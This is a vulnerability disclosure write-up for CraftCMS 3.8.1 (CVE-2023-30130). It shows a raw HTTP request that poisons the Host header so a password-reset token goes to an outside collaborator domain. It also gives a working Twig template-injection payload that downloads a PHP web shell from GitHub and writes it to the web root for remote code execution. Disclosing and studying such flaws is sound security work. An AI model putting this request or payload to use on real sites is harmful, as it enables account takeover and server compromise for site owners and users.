Server-Site Template Injection on CraftCMS 3.8.1

Exploit Author: Tin Pham (aka TF1T) and Trong Pham (aka Dtro) of VietSunshine Cyber Security Services

Vendor of Product: CraftCMS

Affected Product Code Base: 3.8.1

CVE: CVE-2023-30130

Summary:

An issue found in CraftCMS v.3.8.1 allows a remote attacker to execute arbitrary code via a crafted script to the Section parameter.

  1. Go to Settings -> Section -> Edit entry types (Or create new section with Single's Section Type, then edit entry types)

  2. Injection malicious code to Title Format, uses file_get_contents and file_put_contents to upload files and get RCE.

The story:

CraftCMS is open source and a program of huntr.dev.

Bypass authentication

The Reset password is vulnerable to Head host poisoning, when an attacker changes Host header to attacker's domain/IP, the host of reset link that sends to victim email will be replaced with attacker's IP. If victim clicks the link, reset token will send to attacker server, so an attacker can assign new password and takeover target account.

RAW Request:

POST /craft_cms/web/index.php?p=admin/actions/users/send-password-reset-email HTTP/1.1
Host: 0ghrrr0ekjckhxqmm60dk5jy8peg2aqz.oastify.com
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 15_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/98.0.4758.85 Mobile/15E148 Safari/604.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-CSRF-Token: Y6gyOuBAHhUN0BJn5W6WctXfds2d00I4SfLo0EtZ9zxiu-TCgmjyCBrQfA6UBHAgQJtKHrJY4h6diACDrZsITDGejrwfML1oKYOvkrsGuEo=
X-Requested-With: XMLHttpRequest
Content-Length: 16
Connection: close
Cookie: CraftSessionId=v5vpt4j31f7kr23p4ocgfau5n7; CRAFT_CSRF_TOKEN=2a0c3da686a677780c906774b0e732c1c2986d722ad895d238ae0d5e45626b26a%3A2%3A%7Bi%3A0%3Bs%3A16%3A%22CRAFT_CSRF_TOKEN%22%3Bi%3A1%3Bs%3A40%3A%22yxN4tDn5MKXyW6tlHWvN0HJtxlflTiJTK8KP9nJB%22%3B%7D

loginName=admin

RCE

At admin site, we see multiple location allowing user that enter Template code, one of them is at Create a new section with Single's Section Type.

We can inject Twig template to Title Format when editing Entry Types of this section.

We can use 2 function file_get_contents and file_put_contents to RCE as below:

Payload:

{% set source=['https://raw.githubusercontent.com/trungtin1998/Scripts/master/PwnFunction.php']|map('file_get_contents')|join  %} {{{(source):"/var/www/html/shell.php"}|map("file_put_contents")|join()}}

Access /shell.php to execute command:

Impact: Code execution

PreviousCraftCMS

Last updated